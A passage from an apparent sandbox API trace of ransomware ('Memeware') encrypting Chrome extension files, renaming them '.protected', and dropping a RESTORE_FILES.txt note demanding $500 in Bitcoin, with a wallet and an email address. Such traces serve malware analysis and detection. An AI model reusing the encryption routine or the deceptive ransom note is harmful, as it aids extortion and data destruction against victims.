data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\messages.json.protected")) returned 1 [0078.782] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.782] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.782] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\RESTORE_FILES.txt") returned 162 [0078.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.782] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.782] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.783] lstrlenA (lpString="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") returned 684 [0078.783] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 
[0078.783] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.783] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.783] CloseHandle (hObject=0x164) returned 1 [0078.783] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.783] lstrcmpiW (lpString1="pt_PT", lpString2="Windows") returned -1 [0078.783] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files") returned 1 [0078.783] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files (x86)") returned 1 [0078.783] lstrcmpiW (lpString1="pt_PT", lpString2="$Recycle.bin") returned 1 [0078.783] lstrcmpiW (lpString1="pt_PT", lpString2="System Volume Information") returned -1 [0078.783] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT") returned 144 [0078.784] lstrcmpW (lpString1="pt_PT", lpString2=".") returned 1 [0078.784] lstrcmpW (lpString1="pt_PT", lpString2="..") returned 1 [0078.784] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\*") returned 146 [0078.784] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 
[0078.784] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.784] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.784] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.784] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.784] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.784] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\.") returned 146 [0078.784] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.784] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.785] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.785] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.785] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.785] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.785] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.785] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\..") returned 147 [0078.785] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.785] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.785] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.785] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.785] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.785] lstrcmpiW (lpString1="messages.json", lpString2="Program Files 
(x86)") returned -1 [0078.785] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.785] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.785] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json") returned 158 [0078.785] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.785] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.785] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.785] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.785] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.785] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json") returned 158 [0078.785] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.785] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json") returned 158 [0078.785] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.785] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json") returned 158 [0078.785] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.785] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xe0, lpOverlapped=0x0) returned 1 [0078.786] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.786] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xe0, lpOverlapped=0x0) returned 1 [0078.786] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.786] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.786] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.787] CloseHandle (hObject=0x168) returned 1 [0078.787] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json.protected") returned 168 [0078.787] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\messages.json.protected")) returned 1 [0078.787] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.787] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.787] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\RESTORE_FILES.txt") returned 162 [0078.787] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 
[0078.787] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.787] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.788] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.788] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.788] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.788] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.788] CloseHandle (hObject=0x164) returned 1 [0078.788] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.788] lstrcmpiW (lpString1="ro", lpString2="Windows") returned -1 [0078.788] lstrcmpiW (lpString1="ro", lpString2="Program Files") returned 1 [0078.788] lstrcmpiW (lpString1="ro", lpString2="Program Files (x86)") returned 1 [0078.789] lstrcmpiW (lpString1="ro", lpString2="$Recycle.bin") returned 1 [0078.789] lstrcmpiW (lpString1="ro", lpString2="System Volume Information") returned -1 [0078.789] wnsprintfW (in: 
pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro") returned 141 [0078.789] lstrcmpW (lpString1="ro", lpString2=".") returned 1 [0078.789] lstrcmpW (lpString1="ro", lpString2="..") returned 1 [0078.789] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\*") returned 143 [0078.789] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.789] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.789] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.789] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.789] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.789] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.789] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\.") returned 143 [0078.789] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.789] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.789] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.789] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.789] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.789] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.789] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.789] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\..") returned 144 [0078.789] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.789] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.789] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.789] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.789] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.789] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.789] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.789] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.789] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json") returned 155 [0078.789] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.790] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.790] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.790] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.790] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json") returned 155 [0078.790] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.790] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json") returned 155 [0078.790] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.790] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json") returned 155 [0078.790] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.790] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xde, lpOverlapped=0x0) returned 1 [0078.791] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.791] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xde, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xde, lpOverlapped=0x0) returned 1 [0078.791] SetFilePointerEx (in: hFile=0x168, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.791] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.791] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.791] CloseHandle (hObject=0x168) returned 1 [0078.791] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json.protected") returned 165 [0078.791] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json.protected")) returned 1 [0078.792] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.792] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.792] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: 
